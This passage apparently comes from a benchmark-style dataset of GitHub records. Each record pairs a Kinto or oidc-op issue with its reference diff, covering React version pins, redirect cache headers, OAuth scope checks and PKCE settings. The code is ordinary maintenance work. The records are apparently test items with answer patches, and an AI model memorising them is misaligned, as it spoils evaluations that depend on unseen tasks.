"integrity": "sha512-I+vcaK9t4+kypiSgaiVWAipqHRXYmZIuAiS8vzFvXHHXVigg/sMKwlRgLy6LH2i3rmP+0Vzfl5lFsFRwF1r3pg=="
},
"node_modules/react-dom": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz",
- "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
+ "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
"dependencies": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1",
- "scheduler": "^0.20.2"
+ "prop-types": "^15.6.2",
+ "scheduler": "^0.19.1"
},
"peerDependencies": {
- "react": "17.0.2"
+ "react": "^16.14.0"
}
},
"node_modules/react-error-overlay": {
@@ -20221,9 +20187,9 @@
}
},
"node_modules/scheduler": {
- "version": "0.20.2",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz",
- "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==",
+ "version": "0.19.1",
+ "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
+ "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
"dependencies": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1"
@@ -35858,38 +35824,6 @@
"redux-saga": "^1.1.3",
"rimraf": "^3.0.0",
"timeago.js": "^4.0.0"
- },
- "dependencies": {
- "react": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
- "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2"
- }
- },
- "react-dom": {
- "version": "16.14.0",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
- "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1",
- "prop-types": "^15.6.2",
- "scheduler": "^0.19.1"
- }
- },
- "scheduler": {
- "version": "0.19.1",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
- "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
- "requires": {
- "loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
- }
- }
}
},
"kinto-admin-form": {
@@ -38892,12 +38826,13 @@
}
},
"react": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react/-/react-17.0.2.tgz",
- "integrity": "sha512-gnhPt75i/dq/z3/6q/0asP78D0u592D5L1pd7M8P+dck6Fu/jJeL6iVVK23fptSUZj8Vjf++7wXA8UNclGQcbA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react/-/react-16.14.0.tgz",
+ "integrity": "sha512-0X2CImDkJGApiAlcf0ODKIneSwBPhqJawOa5wCtKbu7ZECrmS26NvtSILynQ66cgkT/RJ4LidJOc3bUESwmU8g==",
"requires": {
"loose-envify": "^1.1.0",
- "object-assign": "^4.1.1"
+ "object-assign": "^4.1.1",
+ "prop-types": "^15.6.2"
}
},
"react-app-polyfill": {
@@ -39296,13 +39231,14 @@
"integrity": "sha512-I+vcaK9t4+kypiSgaiVWAipqHRXYmZIuAiS8vzFvXHHXVigg/sMKwlRgLy6LH2i3rmP+0Vzfl5lFsFRwF1r3pg=="
},
"react-dom": {
- "version": "17.0.2",
- "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-17.0.2.tgz",
- "integrity": "sha512-s4h96KtLDUQlsENhMn1ar8t2bEa+q/YAtj8pPPdIjPDGBDIVNsrD9aXNWqspUe6AzKCIG0C1HZZLqLV7qpOBGA==",
+ "version": "16.14.0",
+ "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.14.0.tgz",
+ "integrity": "sha512-1gCeQXDLoIqMgqD3IO2Ah9bnf0w9kzhwN5q4FGnHZ67hBm9yePzB5JJAIQCc8x3pFnNlwFq4RidZggNAAkzWWw==",
"requires": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1",
- "scheduler": "^0.20.2"
+ "prop-types": "^15.6.2",
+ "scheduler": "^0.19.1"
}
},
"react-error-overlay": {
@@ -40413,9 +40349,9 @@
}
},
"scheduler": {
- "version": "0.20.2",
- "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz",
- "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==",
+ "version": "0.19.1",
+ "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.19.1.tgz",
+ "integrity": "sha512-n/zwRWRYSUj0/3g/otKDRPMh6qv2SYMWNq85IEa8iZyAv8od9zDYpGSnpBEjNgcMNq6Scbu5KfIPxNF72R/2EA==",
"requires": {
"loose-envify": "^1.1.0",
"object-assign": "^4.1.1"
diff --git a/kinto/plugins/admin/package.json b/kinto/plugins/admin/package.json
index 04e14d1b9..ec0a8b151 100644
--- a/kinto/plugins/admin/package.json
+++ b/kinto/plugins/admin/package.json
@@ -11,8 +11,8 @@
"codemirror": "^5.63.1",
"kinto-admin": "1.30.2",
"lodash.isequalwith": "^4.4.0",
- "react": "^17.0.2",
- "react-dom": "^17.0.2",
+ "react": "^16.8.6",
+ "react-dom": "^16.8.6",
"react-router": "^5.2.1",
"redux": "^4.1.1",
"typescript": "^4.4.3"
| Fix bundle of kinto-admin 1.30.2, using same versions of React as upstream
| 2021-10-14T08:43:56 | 0.0 | [] | [] |
|||
Kinto/kinto | Kinto__kinto-2875 | eded5e3c35ca867dd6d18203a0aa001db4b5f515 | diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 1b4e5da37..2a039e218 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -6,7 +6,9 @@ This document describes changes between each past release.
14.5.0 (unreleased)
-------------------
-- Nothing changed yet.
+**New feature**
+
+- Add ``kinto.version_prefix_redirect_ttl_seconds`` setting in order to send ``Cache-Control`` response headers on version prefix redirects (fixes #2874)
14.4.1 (2021-09-20)
diff --git a/docs/configuration/settings.rst b/docs/configuration/settings.rst
index 1ab75d22b..2a3f6770e 100644
--- a/docs/configuration/settings.rst
+++ b/docs/configuration/settings.rst
@@ -1064,27 +1064,30 @@ If set to ``0`` then the resource becomes uncacheable (``no-cache``).
Project information
===================
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| Setting name | Default | What does it do? |
-+=======================================+============================================+==========================================================================+
-| kinto.version_json_path | ``./version.json`` | Location of the file containing the information to be shown in the |
-| | | :ref:`version endpoint <api-utilities-version>`. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.error_info_link | ``https://github.com/kinto/kinto/issues/`` | The HTTP link returned when uncaught errors are triggered on the server. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_docs | ``https://kinto.readthedocs.io`` | The URL where the documentation of the Kinto instance can be found. Will |
-| | | be returned in :ref:`the hello view <api-utilities>`. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_name | ``kinto`` | The name of your project (powered by Kinto) |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.project_version | ``''`` | The version of the project. Will be returned in :ref:`the hello view |
-| | | <api-utilities>`. By default, this is the major version of Kinto. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
-| kinto.version_prefix_redirect_enabled | ``True`` | By default, all endpoints exposed by Kinto are prefixed by a |
-| | | :ref:`version number <api-versioning>`. If this flag is enabled, the |
-| | | server will redirect all requests not matching the supported version |
-| | | to the supported one. |
-+---------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| Setting name | Default | What does it do? |
++=================================================+============================================+==========================================================================+
+| kinto.version_json_path | ``./version.json`` | Location of the file containing the information to be shown in the |
+| | | :ref:`version endpoint <api-utilities-version>`. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.error_info_link | ``https://github.com/kinto/kinto/issues/`` | The HTTP link returned when uncaught errors are triggered on the server. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_docs | ``https://kinto.readthedocs.io`` | The URL where the documentation of the Kinto instance can be found. Will |
+| | | be returned in :ref:`the hello view <api-utilities>`. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_name | ``kinto`` | The name of your project (powered by Kinto) |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.project_version | ``''`` | The version of the project. Will be returned in :ref:`the hello view |
+| | | <api-utilities>`. By default, this is the major version of Kinto. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.version_prefix_redirect_enabled | ``True`` | By default, all endpoints exposed by Kinto are prefixed by a |
+| | | :ref:`version number <api-versioning>`. If this flag is enabled, the |
+| | | server will redirect all requests not matching the supported version |
+| | | to the supported one. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
+| kinto.version_prefix_redirect_ttl_seconds | ``-1`` | Seconds specified in cache control headers on version prefix redirects. |
+| | | Set to ``-1`` to disable, and ``0`` to send ``no-cache`` explicitly. |
++-------------------------------------------------+--------------------------------------------+--------------------------------------------------------------------------+
Example:
diff --git a/kinto/core/__init__.py b/kinto/core/__init__.py
index ba5a4cd3e..700bb43e9 100644
--- a/kinto/core/__init__.py
+++ b/kinto/core/__init__.py
@@ -83,6 +83,7 @@
"project_version": "",
"readonly": False,
"retry_after_seconds": 30,
+ "version_prefix_redirect_ttl_seconds": -1,
"settings_prefix": "",
"statsd_backend": "kinto.core.statsd",
"statsd_prefix": "kinto.core",
diff --git a/kinto/core/initialization.py b/kinto/core/initialization.py
index 8499d21a6..4d8a92517 100644
--- a/kinto/core/initialization.py
+++ b/kinto/core/initialization.py
@@ -74,6 +74,7 @@ def setup_version_redirection(config):
settings = config.get_settings()
redirect_enabled = settings["version_prefix_redirect_enabled"]
version_prefix_redirection_enabled = asbool(redirect_enabled)
+ cache_seconds = int(settings["version_prefix_redirect_ttl_seconds"])
route_prefix = config.route_prefix
config.registry.route_prefix = route_prefix
@@ -91,7 +92,10 @@ def _redirect_to_version_view(request):
querystring = request.url[(request.url.rindex(request.path) + len(request.path)) :]
redirect = f"/{route_prefix}{request.path}{querystring}"
- raise HTTPTemporaryRedirect(redirect)
+ resp = HTTPTemporaryRedirect(redirect)
+ if cache_seconds >= 0:
+ resp.cache_expires(cache_seconds)
+ raise resp
# Disable the route prefix passed by the app.
config.route_prefix = None
| Send cache control headers on version redirects
This would allow redirects to be cache at the CDN level
Send cache control headers on version redirects
This would allow redirects to be cache at the CDN level
| 2021-10-07T11:10:08 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-184 | 7407cfab74def2886ab716f4ab38791538d2061b | diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 728a997..38400fc 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.4.0"
+__version__ = "2.4.1"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/oauth2/add_on/extra_args.py b/src/oidcop/oauth2/add_on/extra_args.py
index 68a8a84..ddfd3d4 100644
--- a/src/oidcop/oauth2/add_on/extra_args.py
+++ b/src/oidcop/oauth2/add_on/extra_args.py
@@ -1,3 +1,10 @@
+from oidcmsg.oauth2 import AccessTokenResponse
+from oidcmsg.oauth2 import AuthorizationResponse
+from oidcmsg.oauth2 import TokenExchangeResponse
+from oidcmsg.oauth2 import TokenIntrospectionResponse
+from oidcmsg.oidc import OpenIDSchema
+
+
def pre_construct(response_args, request, endpoint_context, **kwargs):
"""
Add extra arguments to the request.
@@ -11,12 +18,25 @@ def pre_construct(response_args, request, endpoint_context, **kwargs):
_extra = endpoint_context.add_on.get("extra_args")
if _extra:
- for arg, _param in _extra.items():
- _val = endpoint_context.get(_param)
+ if isinstance(response_args, AuthorizationResponse):
+ _args = _extra.get("authorization", {})
+ elif isinstance(response_args, AccessTokenResponse):
+ _args = _extra.get('accesstoken', {})
+ elif isinstance(response_args, TokenExchangeResponse):
+ _args = _extra.get('token_exchange', {})
+ elif isinstance(response_args, TokenIntrospectionResponse):
+ _args = _extra.get('token_introspection', {})
+ elif isinstance(response_args, OpenIDSchema):
+ _args = _extra.get('userinfo', {})
+ else:
+ _args = {}
+
+ for arg, _param in _args.items():
+ _val = getattr(endpoint_context, _param)
if _val:
- request[arg] = _val
+ response_args[arg] = _val
- return request
+ return response_args
def add_support(endpoint, **kwargs):
| A number of bud fixes and new functionality
| 2022-02-04T08:39:48 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-182 | c2e09be571a02cf5203eafad3abc3afbcb893f67 | diff --git a/README.md b/README.md
index f412356c..3b39b93b 100644
--- a/README.md
+++ b/README.md
@@ -32,6 +32,7 @@ It also comes with the following `add_on` modules.
* [OAuth2 PAR](https://datatracker.ietf.org/doc/html/rfc9126)
* [OAuth2 RAR](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-rar)
* [OAuth2 DPoP](https://tools.ietf.org/id/draft-fett-oauth-dpop-04.html)
+* [OAuth 2.0 Authorization Server Issuer Identification](https://datatracker.ietf.org/doc/draft-ietf-oauth-iss-auth-resp)
The entire project code is open sourced and therefore licensed under the [Apache 2.0](https://en.wikipedia.org/wiki/Apache_License)
diff --git a/example/flask_op/server.py b/example/flask_op/server.py
index caada009..36ffd7b3 100755
--- a/example/flask_op/server.py
+++ b/example/flask_op/server.py
@@ -4,9 +4,10 @@
import logging
import os
-from oidcop.configure import Configuration
+from oidcmsg.configure import Configuration
+from oidcmsg.configure import create_from_config_file
+
from oidcop.configure import OPConfiguration
-from oidcop.configure import create_from_config_file
from oidcop.utils import create_context
try:
@@ -62,7 +63,7 @@ def main(config_file, args):
app = oidc_provider_init_app(config.op, 'oidc_op')
app.logger = config.logger
- web_conf = config.webserver
+ web_conf = config.web_conf
context = create_context(dir_path, web_conf)
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 490b473d..728a9970 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.3.4"
+__version__ = "2.4.0"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/endpoint.py b/src/oidcop/endpoint.py
index 854b85ae..2b98815f 100755
--- a/src/oidcop/endpoint.py
+++ b/src/oidcop/endpoint.py
@@ -1,3 +1,4 @@
+import json
import logging
from typing import Callable
from typing import Optional
@@ -363,7 +364,10 @@ def do_response(
if self.response_placement == "body":
if self.response_format == "json":
content_type = "application/json; charset=utf-8"
- resp = _response.to_json()
+ if isinstance(_response, Message):
+ resp = _response.to_json()
+ else:
+ resp = json.dumps(_response)
elif self.response_format in ["jws", "jwe", "jose"]:
content_type = "application/jose; charset=utf-8"
resp = _response
diff --git a/src/oidcop/endpoint_context.py b/src/oidcop/endpoint_context.py
index 00d9da6c..fd135395 100755
--- a/src/oidcop/endpoint_context.py
+++ b/src/oidcop/endpoint_context.py
@@ -119,13 +119,13 @@ class EndpointContext(OidcContext):
}
def __init__(
- self,
- conf: Union[dict, OPConfiguration],
- server_get: Callable,
- keyjar: Optional[KeyJar] = None,
- cwd: Optional[str] = "",
- cookie_handler: Optional[Any] = None,
- httpc: Optional[Any] = None,
+ self,
+ conf: Union[dict, OPConfiguration],
+ server_get: Callable,
+ keyjar: Optional[KeyJar] = None,
+ cwd: Optional[str] = "",
+ cookie_handler: Optional[Any] = None,
+ httpc: Optional[Any] = None,
):
OidcContext.__init__(self, conf, keyjar, entity_id=conf.get("issuer", ""))
self.conf = conf
@@ -148,6 +148,7 @@ def __init__(
# Default values, to be changed below depending on configuration
# arguments for endpoints add-ons
+ self.add_on = {}
self.args = {}
self.authn_broker = None
self.authz = None
@@ -161,7 +162,7 @@ def __init__(
self.login_hint2acrs = None
self.par_db = {}
self.provider_info = {}
- self.scope2claims = SCOPE2CLAIMS
+ self.scope2claims = conf.get("scopes_to_claims", SCOPE2CLAIMS)
self.session_manager = None
self.sso_ttl = 14400 # 4h
self.symkey = rndstr(24)
@@ -215,7 +216,6 @@ def __init__(
"cookie_handler",
"authentication",
"id_token",
- "scope2claims",
]:
_func = getattr(self, "do_{}".format(item), None)
if _func:
diff --git a/src/oidcop/oauth2/add_on/extra_args.py b/src/oidcop/oauth2/add_on/extra_args.py
new file mode 100644
index 00000000..68a8a84a
--- /dev/null
+++ b/src/oidcop/oauth2/add_on/extra_args.py
@@ -0,0 +1,31 @@
+def pre_construct(response_args, request, endpoint_context, **kwargs):
+ """
+ Add extra arguments to the request.
+
+ :param response_args:
+ :param request:
+ :param endpoint_context:
+ :param kwargs:
+ :return:
+ """
+
+ _extra = endpoint_context.add_on.get("extra_args")
+ if _extra:
+ for arg, _param in _extra.items():
+ _val = endpoint_context.get(_param)
+ if _val:
+ request[arg] = _val
+
+ return request
+
+
+def add_support(endpoint, **kwargs):
+ #
+ _added = False
+ for endpoint_name in list(kwargs.keys()):
+ _endp = endpoint[endpoint_name]
+ _endp.pre_construct.append(pre_construct)
+
+ if _added is False:
+ _endp.server_get("endpoint_context").add_on["extra_args"] = kwargs
+ _added = True
diff --git a/src/oidcop/session/claims.py b/src/oidcop/session/claims.py
index 7ca31cc7..bcea0580 100755
--- a/src/oidcop/session/claims.py
+++ b/src/oidcop/session/claims.py
@@ -117,7 +117,10 @@ def get_claims_from_request(
_always_add = module.kwargs.get("always_add_claims", {})
if _always_add:
- base_claims.update({k: None for k in _always_add})
+ if isinstance(_always_add, list):
+ base_claims.update({k: None for k in _always_add})
+ else:
+ base_claims.update(_always_add)
if _claims_by_scope:
if scopes is None:
diff --git a/src/oidcop/session/grant.py b/src/oidcop/session/grant.py
index 16b4eb0a..a7c6f8d0 100644
--- a/src/oidcop/session/grant.py
+++ b/src/oidcop/session/grant.py
@@ -227,7 +227,7 @@ def payload_arguments(
if self.authorization_request:
client_id = self.authorization_request.get("client_id")
if client_id:
- payload.update({"client_id": client_id, "sub": client_id})
+ payload.update({"client_id": client_id, "sub": self.sub})
_claims_restriction = endpoint_context.claims_interface.get_claims(
session_id,
| The configure parameter scopes_to_claims was not handled correctly.
The parameter was basically ignored.
| 2022-02-01T10:48:27 | 0.0 | [] | [] |
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-122 | 41d7f5e86ad086b6b3c266d1b92d54cbfe2b8733 | diff --git a/.github/workflows/pypi.yml b/.github/workflows/pypi.yml
new file mode 100644
index 00000000..4a916526
--- /dev/null
+++ b/.github/workflows/pypi.yml
@@ -0,0 +1,35 @@
+name: Publish Python distribution to PyPI
+on:
+ release:
+ types:
+ - created
+
+jobs:
+ build-n-publish:
+ name: Publish Python distribution to PyPI
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@master
+ - name: Setup Python 3.8
+ uses: actions/setup-python@v1
+ with:
+ python-version: 3.8
+ - name: Install pypa/build
+ run: >-
+ python -m
+ pip install
+ build
+ --user
+ - name: Build a binary wheel and a source tarball
+ run: >-
+ python -m
+ build
+ --sdist
+ --wheel
+ --outdir dist/
+ .
+ - name: Publish distribution to PyPI
+ uses: pypa/gh-action-pypi-publish@master
+ with:
+ user: __token__
+ password: ${{ secrets.PYPI_API_TOKEN }}
diff --git a/docs/source/contents/conf.rst b/docs/source/contents/conf.rst
index 34493edc..483a7d4c 100644
--- a/docs/source/contents/conf.rst
+++ b/docs/source/contents/conf.rst
@@ -84,6 +84,27 @@ An example::
}
}
+The provided add-ons can be seen in the following sections.
+
+pkce
+####
+
+The pkce add on is activated using the ``oidcop.oidc.add_on.pkce.add_pkce_support``
+function. The possible configuration options can be found below.
+
+essential
+---------
+
+Whether pkce is mandatory, authentication requests without a ``code_challenge``
+will fail if this is True. This option can be overridden per client by defining
+``pkce_essential`` in the client metadata.
+
+code_challenge_method
+---------------------
+
+The allowed code_challenge methods. The supported code challenge methods are:
+``plain, S256, S384, S512``
+
--------------
authentication
--------------
@@ -622,3 +643,72 @@ the following::
}
}
}
+
+
+=======
+Clients
+=======
+
+In this section there are some client configuration examples.
+
+A common configuration::
+
+ endpoint_context.cdb['jbxedfmfyc'] = {
+ client_id: 'jbxedfmfyc',
+ client_salt: '6flfsj0Z',
+ registration_access_token: 'z3PCMmC1HZ1QmXeXGOQMJpWQNQynM4xY',
+ registration_client_uri: 'https://127.0.0.1:8000/registration_api?client_id=jbxedfmfyc',
+ client_id_issued_at: 1630256902,
+ client_secret: '19cc69b70d0108f630e52f72f7a3bd37ba4e11678ad1a7434e9818e1',
+ client_secret_expires_at: 1929727754,
+ application_type: 'web',
+ contacts: [
+ '[email protected]'
+ ],
+ token_endpoint_auth_method: 'client_secret_basic',
+ redirect_uris: [
+ [
+ 'https://127.0.0.1:8090/authz_cb/satosa',
+ {}
+ ]
+ ],
+ post_logout_redirect_uris: [
+ [
+ 'https://127.0.0.1:8090/session_logout/satosa',
+ null
+ ]
+ ],
+ response_types: [
+ 'code'
+ ],
+ grant_types: [
+ 'authorization_code'
+ ],
+ allowed_scopes: [
+ 'openid',
+ 'profile',
+ 'email',
+ 'offline_access'
+ ]
+ }
+
+
+How to configure the release of the user claims per clients::
+
+ endpoint_context.cdb["client_1"] = {
+ "client_secret": "hemligt",
+ "redirect_uris": [("https://example.com/cb", None)],
+ "client_salt": "salted",
+ "token_endpoint_auth_method": "client_secret_post",
+ "response_types": ["code", "token", "code id_token", "id_token"],
+ "add_claims": {
+ "always": {
+ "introspection": ["nickname", "eduperson_scoped_affiliation"],
+ "userinfo": ["picture", "phone_number"],
+ },
+ # this overload the general endpoint configuration for this client
+ # self.server.server_get("endpoint", "id_token").kwargs = {"add_claims_by_scope": True}
+ "by_scope": {
+ "id_token": False,
+ },
+ },
diff --git a/docs/source/contents/usage.md b/docs/source/contents/usage.md
index 5fb8ab70..795cc0d3 100644
--- a/docs/source/contents/usage.md
+++ b/docs/source/contents/usage.md
@@ -1,7 +1,7 @@
Usage
-----
-Some examples, how to run flask_op and django_op, but also some typical configuration in relation to common use cases.
+Some examples, how to run [flask_op](https://github.com/IdentityPython/oidc-op/tree/master/example/flask_op) and [django_op](https://github.com/peppelinux/django-oidc-op) but also some typical configuration in relation to common use cases.
@@ -34,7 +34,7 @@ Get to the RP landing page to choose your authentication endpoint. The first opt

-AS/OP accepted our authentication request and prompt to us the login form. Read passwd.json file to get credentials.
+The AS/OP supports dynamic client registration, it accepts the authentication request and prompt to us the login form. Read [passwd.json](https://github.com/IdentityPython/oidc-op/blob/master/example/flask_op/passwd.json) file to get credentials.
----------------------------------
@@ -75,12 +75,12 @@ It is important to consider that only scope=offline_access will get a usable ref
oidc-op will return a json response like this::
-{
- 'access_token': 'eyJhbGc ... CIOH_09tT_YVa_gyTqg',
- 'token_type': 'Bearer',
- 'scope': 'openid profile email address phone offline_access',
- 'refresh_token': 'Z0FBQ ... 1TE16cm1Tdg=='
-}
+ {
+ 'access_token': 'eyJhbGc ... CIOH_09tT_YVa_gyTqg',
+ 'token_type': 'Bearer',
+ 'scope': 'openid profile email address phone offline_access',
+ 'refresh_token': 'Z0FBQ ... 1TE16cm1Tdg=='
+ }
diff --git a/example/flask_op/views.py b/example/flask_op/views.py
index f8e485b6..a10d41fc 100644
--- a/example/flask_op/views.py
+++ b/example/flask_op/views.py
@@ -32,6 +32,7 @@ def _add_cookie(resp, cookie_spec):
for k,v in cookie_spec.items()
if k not in ('name',)}
kwargs["path"] = "/"
+ kwargs["samesite"] = "Lax"
resp.set_cookie(cookie_spec["name"], **kwargs)
diff --git a/requirements.txt b/requirements.txt
index 9126daf7..d7aa79dd 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,4 +1,4 @@
-oidcmsg>=1.3.0
+oidcmsg>=1.4.0
pyyaml
jinja2>=2.11.3
responses>=0.13.0
diff --git a/src/oidcop/__init__.py b/src/oidcop/__init__.py
index 9b05f0cf..353bd1f8 100644
--- a/src/oidcop/__init__.py
+++ b/src/oidcop/__init__.py
@@ -1,6 +1,6 @@
import secrets
-__version__ = "2.1.0"
+__version__ = "2.1.1"
DEF_SIGN_ALG = {
"id_token": "RS256",
diff --git a/src/oidcop/client_authn.py b/src/oidcop/client_authn.py
index f02868d9..7678419a 100755
--- a/src/oidcop/client_authn.py
+++ b/src/oidcop/client_authn.py
@@ -22,6 +22,7 @@
from oidcop.exception import InvalidClient
from oidcop.exception import MultipleUsage
from oidcop.exception import NotForMe
+from oidcop.exception import ToOld
from oidcop.exception import UnknownClient
from oidcop.util import importer
@@ -409,6 +410,8 @@ def verify_client(
try:
# get_client_id_from_token is a callback... Do not abuse for code readability.
auth_info["client_id"] = get_client_id_from_token(endpoint_context, _token, request)
+ except ToOld:
+ raise ValueError("Expired token")
except KeyError:
raise ValueError("Unknown token")
diff --git a/src/oidcop/oauth2/token.py b/src/oidcop/oauth2/token.py
index 87724793..e84ea887 100755
--- a/src/oidcop/oauth2/token.py
+++ b/src/oidcop/oauth2/token.py
@@ -253,7 +253,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
_resp = {
"access_token": access_token.value,
"token_type": access_token.token_type,
- "scope": _grant.scope,
+ "scope": scope,
}
if access_token.expires_at:
@@ -318,7 +318,7 @@ def post_parse_request(
if "scope" in request:
req_scopes = set(request["scope"])
scopes = set(grant.find_scope(token.based_on))
- if scopes < req_scopes:
+ if not req_scopes.issubset(scopes):
return self.error_cls(
error="invalid_request",
error_description="Invalid refresh scopes",
diff --git a/src/oidcop/oidc/add_on/pkce.py b/src/oidcop/oidc/add_on/pkce.py
index 75b541d6..6825c38c 100644
--- a/src/oidcop/oidc/add_on/pkce.py
+++ b/src/oidcop/oidc/add_on/pkce.py
@@ -3,11 +3,9 @@
from typing import Dict
from cryptojwt.utils import b64e
-from oidcmsg.oauth2 import (
- AuthorizationErrorResponse,
- RefreshAccessTokenRequest,
- TokenExchangeRequest,
-)
+from oidcmsg.oauth2 import AuthorizationErrorResponse
+from oidcmsg.oauth2 import RefreshAccessTokenRequest
+from oidcmsg.oauth2 import TokenExchangeRequest
from oidcmsg.oidc import TokenErrorResponse
from oidcop.endpoint import Endpoint
@@ -41,7 +39,14 @@ def post_authn_parse(request, client_id, endpoint_context, **kwargs):
:param kwargs:
:return:
"""
- if endpoint_context.args["pkce"]["essential"] and "code_challenge" not in request:
+ client = endpoint_context.cdb[client_id]
+ if "pkce_essential" in client:
+ essential = client["pkce_essential"]
+ else:
+ essential = endpoint_context.args["pkce"].get(
+ "essential", False
+ )
+ if essential and "code_challenge" not in request:
return AuthorizationErrorResponse(
error="invalid_request", error_description="Missing required code_challenge",
)
@@ -131,9 +136,6 @@ def add_pkce_support(endpoint: Dict[str, Endpoint], **kwargs):
authn_endpoint.post_parse_request.append(post_authn_parse)
token_endpoint.post_parse_request.append(post_token_parse)
- if "essential" not in kwargs:
- kwargs["essential"] = False
-
code_challenge_methods = kwargs.get("code_challenge_methods", CC_METHOD.keys())
kwargs["code_challenge_methods"] = {}
diff --git a/src/oidcop/oidc/token.py b/src/oidcop/oidc/token.py
index 0a4aeca9..a88f45c8 100755
--- a/src/oidcop/oidc/token.py
+++ b/src/oidcop/oidc/token.py
@@ -218,7 +218,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
_resp = {
"access_token": access_token.value,
"token_type": token_type,
- "scope": _grant.scope,
+ "scope": scope,
}
if access_token.expires_at:
@@ -246,7 +246,7 @@ def process_request(self, req: Union[Message, dict], **kwargs):
if "id_token" in _mints and "openid" in scope:
try:
_idtoken = self._mint_token(
- token_class="refresh_token",
+ token_class="id_token",
grant=_grant,
session_id=_session_info["session_id"],
client_id=_session_info["client_id"],
@@ -307,7 +307,7 @@ def post_parse_request(
if "scope" in request:
req_scopes = set(request["scope"])
scopes = set(grant.find_scope(token.based_on))
- if scopes < req_scopes:
+ if not req_scopes.issubset(scopes):
return self.error_cls(
error="invalid_request",
error_description="Invalid refresh scopes",
diff --git a/src/oidcop/session/claims.py b/src/oidcop/session/claims.py
index edcb1076..5ac1991c 100755
--- a/src/oidcop/session/claims.py
+++ b/src/oidcop/session/claims.py
@@ -5,6 +5,7 @@
from oidcmsg.oidc import OpenIDSchema
from oidcop.exception import ServiceError
+from oidcop.exception import ImproperlyConfigured
from oidcop.scopes import convert_scopes2claims
logger = logging.getLogger(__name__)
@@ -41,7 +42,11 @@ def authorization_request_claims(self,
